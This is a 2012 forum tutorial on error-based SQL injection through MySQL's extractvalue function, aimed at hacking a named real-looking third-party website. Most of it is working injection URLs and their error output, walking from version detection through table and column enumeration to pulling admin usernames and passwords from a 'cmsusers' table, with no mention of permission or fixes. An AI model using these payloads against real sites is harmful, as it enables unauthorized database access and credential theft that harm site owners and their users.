XPATH SQL Injection Tutorial

Crow_SL · 10-23-2012, 05:25 PM

XPATH SQL Injection

Index

Intro.
Getting the Version.
How to get tables.
How to get columns.
Outro.

Intro.
Hi all on Anarchy Forums,
Today i will explain you and show you how to hack vulnerable site with SQLi called XPATH.
So Xpath ( XML Path Language ) is to XML as SQL is to databases: XML application need XPath to locate specific data within an XML document for further processing with other XML applications.
The things you will need for successful Xpath:

Vulnerable site ( http://www.twcpublicity.com/movie.php?id=75 )
Text to hex converter ( http://www.swingnote.com/tools/texttohex.php )

So lets begin.

Getting the Version
Now that we have found our SQLi vulnerable site we need to know the version of our site.
We will do that with this Xpath code:

Code:
and extractvalue(rand(),concat(0x7e,version()))--

And our code in the link will look like this:

Code:
http://www.twcpublicity.com/movie.php?id=75 and extractvalue(rand(),concat(0x7e,version()))--

This will give us a version of server that site uses.

Code:
XPATH syntax error: '~5.1.49-3-log'

Now that we got our version lets get our tables from site.

How to get tables
Finding the tables are very easy u just need to put this code:

Code:
and extractvalue(rand(),concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1)))--

And that code will look like this in the url:

Code:
http://www.twcpublicity.com/movie.php?id=75 and extractvalue(rand(),concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1)))--

Now you should get your first table.
Our is cmsusers.

Code:
XPATH syntax error: '~cmsusers

Now to explaine something, if you don't get your desired table ( users, admin, etc ) on limit 0,1 just raise number the first number ( 0 ) untile you get it.

Code:
http://www.twcpublicity.com/movie.php?id=75 and extractvalue(rand(),concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 1,1)))--

This is what we get on limit 1,1

Code:
XPATH syntax error: '~marketing

So first table was cmsusers and this is the second on ( markeging )
This limit you will use when you trying to find tables, columns, etc.
If you get blank page or normal page then there is no more tables, columns, etc.
Now let extract info from our table "cmsusers".
How to get columns
So now we have table that might containe useful info.
Its time to get columns from it.
This is the code:

Code:
and extractvalue(rand(),concat(0x7e,(select column_name from information_schema.columns where table_name=hex limit 0,1)))--

Befor we continue go to text to hex converter ( on top of the page )
and hex our tables cmsusers.
NOTE: YOU NEED TO PUT 0x befor hex in order to work.
This is how it looks:

Code:
0x636d737573657273

And that hex we put in url so it will look like this:

Code:
http://www.twcpublicity.com/movie.php?id=75 and extractvalue(rand(),concat(0x7e,(select column_name from information_schema.columns where table_name=0x636d737573657273 limit 0,1)))--

And now first column is " id "

Code:
XPATH syntax error: '~id'

So now raise limit like when we trying to find more tables.
Its same code but limit is 1,1

Code:
XPATH syntax error: '~name

" name" is our second column
Raise it more to 2,1

Code:
XPATH syntax error: '~pword'

And our third column is " pword ".
When we raise it to 3,1 we got normal page.
Now lets extract info from our columns.
The code will be

Code:
and extractvalue(rand(),concat(0x7e,(select concat(yourColumn,0x7e,yourColumn) from yourTable limit 0,1)))--

Just replace yourColumns with normal name and yourTable ofc.
So that code will look like this in url:

Code:
http://www.twcpublicity.com/movie.php?id=75 and extractvalue(rand(),concat(0x7e,(select concat(name,0x7e,pword) from cmsusers limit 0,1)))--

Now you should get admin info.

Outro.
Thats it guys i hope this will be helpful and i hope you did learn something.
Sorry for my bad english i am trying to make it understandable.

-crow